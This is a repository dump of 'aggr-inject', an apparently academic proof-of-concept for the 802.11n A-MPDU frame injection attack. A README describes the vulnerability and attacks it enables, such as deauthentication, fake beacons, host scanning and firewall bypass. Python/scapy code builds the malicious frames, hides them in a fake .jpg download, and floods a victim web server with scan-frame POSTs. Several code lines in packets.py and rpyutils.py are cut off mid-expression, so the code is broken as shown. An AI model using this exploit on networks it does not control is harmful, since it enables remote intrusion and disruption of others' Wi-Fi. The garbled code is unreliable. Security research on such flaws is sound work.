Repository: rpp0/aggr-inject
Branch: master
Commit: c5e953f93fc6
Files: 6
Total size: 23.8 KB
Directory structure:
gitextract_ibeh_xil/
├── LICENSE
├── README.md
├── aggr-inject.py
├── constants.py
├── packets.py
└── rpyutils.py
================================================
FILE CONTENTS
================================================
================================================
FILE: LICENSE
================================================
Copyright (c) 2015, Pieter Robyns
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
================================================
FILE: README.md
================================================
aggr-inject
===========
aggr-inject is a proof-of-concept implementation of the A-MPDU subframe injection attack, which allows an attacker to inject raw Wi-Fi frames into unencrypted networks remotely. The PoC exploits a vulnerability in the 802.11n frame aggregation mechanism and can be performed against almost any modern Wi-Fi chipset, given that the target is connected to an open network. Results from this research were published in a paper and presented at the ACM WiSec 2015 security conference.
Background
----------
A regular 802.11n Wi-Fi frame looks as follows:
The 802.11n standard specifies a new MAC frame (MPDU) aggregation mechanism intended to decrease overhead when transmitting multiple frames. In essence, the sender will aggregate multiple MPDUs in a single PHY frame as follows:
Here, each subframe is prepended with a delimiter in order to indicate its starting position and length inside the aggregated frame. When the receiver receives the aggregate, the delimiters are removed, and each subframe is deaggregated and forwarded to the kernel for further processing.
Vulnerability
-------------
The deaggregation algorithm specified in the standard is flawed because the MPDU delimiters are transmitted with the same data rate and modulation method as the frame payload. This allows us to create our own subframes (low layer frames) within any higher layer e.g. HTTP, FTP, ICMP, etc. In other words, we can embed a malicious MAC frame including the delimiter inside an outer frame, for example a HTTP frame. When such frames are aggregated, any bit error in the delimiter of the outer frame will cause the receiver to interpret our malicious, inner frame instead!
An example scenario of how an attack could be performed is shown below. Here, the attacker serves a .jpg file containing malicious frames on a web server. When the .jpg is downloaded, the receiver will see the attacker's malicious frames with every occurence of a bit error in the HTTP subframe delimiter.
Thanks to https://github.com/zhovner for creating this animation!
Consequences
------------
Depending on whether the attacker knows the MAC address of the targeted network's AP, several attacks can be performed using aggr-inject:
- Deauthenticate clients
- Inject malicious Beacon frames (e.g. overly long SSID field)
- Perform a host or port scan
- Bypass firewall rules
- ARP spoofing
- ...
All of these attacks can be performed remotely and without owning a wireless device, since the deaggregation happens at the final hop and since it does not matter how the packet travels to its destination.
Practical proof-of-concept
--------------------------
If you want to see the attack in action on your own network, run option 1 of the PoC to generate the image file containing Beacon subframes (300 MB), then upload it to your web server. Finally, download the image **while being connected to an open 802.11n network with frame aggregation enabled**. Then, while downloading, check either Wireshark or your list of discovered networks (usually takes several downloads of the image for it to appear in the list of networks), and you should see a new network named "injected SSID" coming from MAC address 00:00:00:00:00:00. The amount of Beacons you see will depend on how fast frames are corrupted on your network and how often your AP performs frame aggregation.
Details
-------
More details about the attack can be found in my paper at [this location](https://github.com/rpp0/aggr-inject/blob/master/paper/ampdu_inj_wisec2015.pdf). My presentation can be downloaded [here](https://github.com/rpp0/aggr-inject/blob/master/presentation/wisec2015.pdf).
Contact
-------
I'm happy to answer any questions via the Reddit thread concerning this attack (https://www.reddit.com/r/netsec/comments/3bq96e/vulnerability_in_80211n_standard_allows_remote/), Twitter (https://twitter.com/redplusplus) or my e-mail, which you can find at the end of my presentation.
================================================
FILE: aggr-inject.py
================================================
#!/usr/bin/env python2
from rpyutils import printd, Color, Level, clr, VERBOSITY
from packets import AMPDUPacket, AMSDUPacket, ping_packet, arp_packet, tcp_syn, ssid_packet, probe_response
import requests
import random
import sys
class MaliciousDownload():
def __init__(self, package):
self.data = str(package)
def write(self):
with open('download.jpg', 'w') as f:
for i in range(0, 10000):
f.write(("\x00" * random.randint(0, 3)) + str(self.data))
def fuzztf(option1, option2):
test = random.randint(0, 1)
if test:
return option1
else:
return option2
def main_download():
# Malicious download
raw_input("This will create a 300 MB file download.jpg in the working directory. Press any key to continue or CTRL+C to exit.")
printd(clr(Color.YELLOW, "Creating malicious download..."), Level.INFO)
container = ""
for i in range(0, 256):
# Containers are (series of) frames to inject into the remote network
# Container for scanning hosts on internal network
#md_pkt = AMPDUPacket('ff:ff:ff:ff:ff:ff', '4C:5E:0C:9E:82:19', '4C:5E:0C:9E:82:19', 0x02)
#md_pkt.add_msdu(ping_packet(i, "10.0.0.1", "192.168.88.249"))
#md_pkt.add_padding(8)
# Container for a Beacon frame
md_pkt = ssid_packet()
container += str(md_pkt)
md = MaliciousDownload(container)
md.write()
def main():
session = requests.Session()
count = 1
ip_count = 0
printd(clr(Color.BLUE, "Building container..."), Level.INFO)
""" Build container """
container = ''
for i in range(0, 800):
count = (count + 1) % 1024
ip_count = (ip_count % 255) + 1
# Ping from attacker --> victim
# You need to change the MAC addresses and IPs to match the remote AP
ampdu_pkt = AMPDUPacket('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B', '64:D1:A3:3D:26:5B', 0x02)
ampdu_pkt.add_msdu(ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))
ampdu_pkt.add_padding(8)
container += str(ampdu_pkt)
# Beacon from attacker --> victim
#ampdu_pkt = ssid_packet()
#container += str(ampdu_pkt)
# Ping from victim --> access point
#ampdu_pkt = AMPDUPacket('4C:5E:0C:9E:82:19', 'f8:1a:67:1b:14:00', '4C:5E:0C:9E:82:19')
#ampdu_pkt.add_msdu(ping_packet(count, "192.168.88.254", "10.0.0." + str(ip_count)))
#ampdu_pkt.add_padding(8)
#container += str(ampdu_pkt)
""" end package """
printd(clr(Color.BLUE, "Finished building container! Sending..."), Level.INFO)
while 1:
print("."),
sys.stdout.flush()
request_params = {'postpayload': ("\x00" * random.randint(0, 3)) + str(container)}
try:
session.post("http://" + "10.0.0.6:80" + "/index.html", files=request_params, timeout=5)
except requests.exceptions.ConnectionError:
printd(clr(Color.RED, "Could not connect to host"), Level.CRITICAL)
pass
except Exception:
printd(clr(Color.RED, "Another exception"), Level.CRITICAL)
pass
if __name__ == "__main__":
try:
pocnum = raw_input("Two PoCs are available. Suggested approach to test the vulnerability is to choose option 1"
" and upload the file to your web server. Then, download while connected to an _open_ "
"network and observe Wireshark output for MAC 00:00:00:00:00:00 in monitor mode. Waving "
"your hand over the antenna of the receiver can speed up the injection rate if you don't "
"want to wait too long to see the results.\n"
"\t1) Generate 300 MB .jpg file containing malicious Beacon frames (pulled by victim).\n"
"\t2) Connect to victim web server and POST malicious host scanning ICMP frames (push to victim).\n"
"Note: for option 2 you need to change the MAC addresses and IPs in the source to match the remote AP.\n"
"Choice: ")
if pocnum == "1":
main_download()
elif pocnum == "2":
main()
else:
printd("Invalid PoC number.", Level.CRITICAL)
except KeyboardInterrupt:
printd("\nExiting...", Level.INFO)
================================================
FILE: constants.py
================================================
import platform
RUNNING_ON_PI = platform.machine() == 'armv6l'
DEFAULT_DNS_SERVER = "8.8.8.8"
RSN = "\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x01\x28\x00"
AP_WLAN_TYPE_OPEN = 0
AP_WLAN_TYPE_WPA = 1
AP_WLAN_TYPE_WPA2 = 2
AP_WLAN_TYPE_WPA_WPA2 = 3
AP_AUTH_TYPE_OPEN = 0
AP_AUTH_TYPE_SHARED = 1
AP_RATES = "\x0c\x12\x18\x24\x30\x48\x60\x6c"
DOT11_MTU = 4096
DOT11_TYPE_MANAGEMENT = 0
DOT11_TYPE_CONTROL = 1
DOT11_TYPE_DATA = 2
DOT11_SUBTYPE_DATA = 0x00
DOT11_SUBTYPE_PROBE_REQ = 0x04
DOT11_SUBTYPE_AUTH_REQ = 0x0B
DOT11_SUBTYPE_ASSOC_REQ = 0x00
DOT11_SUBTYPE_REASSOC_REQ = 0x02
DOT11_SUBTYPE_QOS_DATA = 0x28
IFNAMSIZ = 16
IFF_TUN = 0x0001
IFF_TAP = 0x0002 # Should we want to tunnel layer 2...
IFF_NO_PI = 0x1000
TUNSETIFF = 0x400454ca
================================================
FILE: packets.py
================================================
from scapy.all import sr1, sr, srp1, send, sendp, hexdump, ETH_P_IP
from scapy.layers.inet import Raw, Ether, TCP, IP, ICMP, ARP
from scapy.layers.dot11 import Dot11, LLC, SNAP, RadioTap, Dot11Beacon, Dot11Elt, Dot11ProbeResp
from constants import *
from rpyutils import get_frequency, printd, Color, Level, clr, hex_offset_to_string
import random
import crcmod
import struct
import time
# Configuration
DEFAULT_SOURCE_IP = '10.0.0.2'
DEFAULT_DEST_IP = '10.0.0.1'
DEFAULT_SOURCE_MAC = 'ff:ff:ff:ff:ff:ff'
DEFAULT_DEST_MAC = 'ff:ff:ff:ff:ff:ff'
CHANNEL = 1
MONITOR_INTERFACE = 'mon0'
# 802.11 MAC CRC
def dot11crc(pkt):
crc_fun = crcmod.Crc(0b100000100110000010001110110110111, rev=True, initCrc=0x0, xorOut=0xFFFFFFFF)
crc_fun.update(str(pkt))
crc = struct.pack(' 0:
self.data /= padding
self.data = self.data / Ether(src=self.src_mac, dst=self.recv_mac, type=msdu_len) / msdu
self.num_subframes += 1
def send(self):
return sendp(self.data, iface=MONITOR_INTERFACE, verbose=False)
"""
Total Aggregate (A-MPDU) length; the aggregate length is the number of bytes of
the entire aggregate. This length should be computed as:
delimiters = start_delim + pad_delim;
frame_pad = (frame_length % 4) ? (4 - (frame_length % 4)) : 0
agg_length = sum_of_all (frame_length + frame_pad + 4 * delimiters)
"""
# 802.11 frame class with support for adding multiple MPDUs to a single PHY frame
class AMPDUPacket():
def __init__(self, recv_mac, src_mac, dst_mac, ds=0x01):
self.rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\x00\x6c' + get_frequency(CHANNEL) + '\xc0\x00\xc0\x01\x00\x00')
self.dot11hdr = Dot11(type="Data", subtype=DOT11_SUBTYPE_QOS_DATA, addr1=recv_mac, addr2=src_mac, addr3=dst_mac, SC=0x3060, FCfield=ds) / Raw("\x00\x00")
self.data = self.rt
self.num_subframes = 0
self.recv_mac = recv_mac
self.src_mac = src_mac
self.dst_mac = dst_mac
def __str__(self):
return str(self.data[RadioTap].payload)
# Higher layer packet
def add_msdu(self, msdu, msdu_len=-1):
# Default msdu len
if msdu_len == -1:
msdu_len = len(msdu)
mpdu_len = msdu_len + len(self.dot11hdr) + 4 # msdu + mac80211 + FCS
if mpdu_len % 4 != 0:
padding = "\x00" * (4 - (mpdu_len % 4)) # Align to 4 octets
else:
padding = ""
mpdu_len <<= 4
crc_fun = crcmod.mkCrcFun(0b100000111, rev=True, initCrc=0x00, xorOut=0xFF)
crc = crc_fun(struct.pack('> 4, crc, delim_sig))
#hexdump(maccrc)
ampdu_header = struct.pack('> 4, crc, delim_sig))
#hexdump(maccrc)
ampdu_header = struct.pack('> 4, crc, delim_sig))
#hexdump(maccrc)
ampdu_header = struct.pack('= level:
print(string)
def hex_offset_to_string(byte_array):
temp = byte_array.replace("\n", "")
temp = temp.replace(" ", "")
return temp.decode("hex")
def get_frequency(channel):
if channel == 14:
freq = 2484
else:
freq = 2407 + (channel * 5)
freq_string = struct.pack("